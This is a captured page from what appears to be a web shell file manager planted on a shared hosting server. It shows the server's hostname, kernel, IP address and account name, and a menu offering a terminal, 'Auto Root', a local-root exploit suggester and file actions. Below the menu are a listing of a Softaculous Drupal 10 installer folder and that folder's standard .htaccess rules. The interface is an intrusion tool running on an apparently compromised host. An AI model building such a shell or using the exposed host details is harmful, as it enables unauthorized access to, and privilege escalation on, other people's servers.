Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
drupal10 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
php53
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
php56
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
php71
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
php81
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
php82
[ DIR ]
drwxr-xr-x
2025-08-09 08:10
.htaccess
685
B
-rw-r--r--
2023-07-11 23:07
NOTES.txt
2.03
KB
-rw-r--r--
2024-08-05 02:36
README.txt
278
B
-rw-r--r--
2024-08-05 02:36
_htaccess
486
B
-rw-r--r--
2023-07-11 23:07
clone.php
14.31
KB
-rw-r--r--
2025-08-08 02:41
drupal10.sql
2.09
MB
-rw-r--r--
2025-08-07 23:58
drupal10.zip
32.03
MB
-rw-r--r--
2025-08-07 23:58
edit.php
5.07
KB
-rw-r--r--
2025-08-08 02:41
edit.xml
433
B
-rw-r--r--
2023-07-11 23:07
extend.php
14.86
KB
-rw-r--r--
2025-08-08 02:41
fileindex.php
271
B
-rw-r--r--
2023-09-21 21:12
import.php
5.66
KB
-rw-r--r--
2025-08-08 02:41
info.xml
3.92
KB
-rw-r--r--
2025-08-07 23:58
install.js
1.32
KB
-rw-r--r--
2024-08-05 02:36
install.php
9.43
KB
-rw-r--r--
2025-08-08 02:41
install.xml
1.1
KB
-rw-r--r--
2023-07-11 23:07
md5
1.45
KB
-rw-r--r--
2025-08-08 02:41
settings.php
36.13
KB
-rw-r--r--
2024-11-12 23:42
update_pass.php
541
B
-rw-r--r--
2024-08-05 02:36
upgrade.php
4.43
KB
-rw-r--r--
2025-08-08 02:41
upgrade.xml
309
B
-rw-r--r--
2023-07-11 23:07
Save
Rename
# Deny all requests from Apache 2.4+. <IfModule mod_authz_core.c> Require all denied </IfModule> # Deny all requests from Apache 2.0-2.2. <IfModule !mod_authz_core.c> Deny from all </IfModule> # Turn off all options we don't need. Options -Indexes -ExecCGI -Includes -MultiViews # Set the catch-all handler to prevent scripts from being executed. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006 <Files *> # Override the handler again if we're run later in the evaluation list. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003 </Files> # If we know how to do it safely, disable the PHP engine entirely. <IfModule mod_php.c> php_flag engine off </IfModule>